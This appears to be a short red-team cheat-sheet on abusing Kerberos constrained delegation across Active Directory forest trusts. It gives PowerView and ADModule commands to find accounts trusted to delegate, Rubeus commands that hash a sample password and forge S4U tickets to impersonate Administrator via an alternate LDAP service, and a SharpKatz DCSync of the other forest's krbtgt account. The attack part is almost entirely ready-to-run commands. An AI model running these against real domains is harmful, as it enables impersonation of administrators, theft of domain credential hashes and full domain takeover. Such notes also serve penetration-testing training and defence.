# constrained-delegation

The classic Constrained Delegation does not work across forest trusts. But we can abuse it once we have a beachhead/foothold across forest trust.

## Powershell

### PowerView

```
Get-DomainUser –TrustedToAuth -Domain <target>
Get-DomainComputer –TrustedToAuth -Domain <target>
```

## ADModule

```
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <target>
```

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

## Rubeus

**We can request an alternate ticket using Rubeus**

```
C:\AD\Tools\Rubeus.exe hash /password:Qwerty@2019 /user:storagesvc /domain:eu.local
```

**Get creds for compromised user and request ldap altservice**

note that use of AES256 may not work across forests as it depends on whether or not AES encryption is supported

```
C:\AD\Tools\Rubeus.exe s4u /user:<owned_user> /rc4:<ntlm_owned_user> /impersonateuser:Administrator /domain:eu.local /msdsspn:cifs/some_machine.other_forest.local /altservice:ldap /domain:other_forest.local /dc:some-dc.other_forest.locall /ptt
```

**DCSync**

```
./SharpKatz.exe --Command dcsync --user other_forest\krbtgt --Domain other_forest.local --DomainController some-dc.other_forest.local
```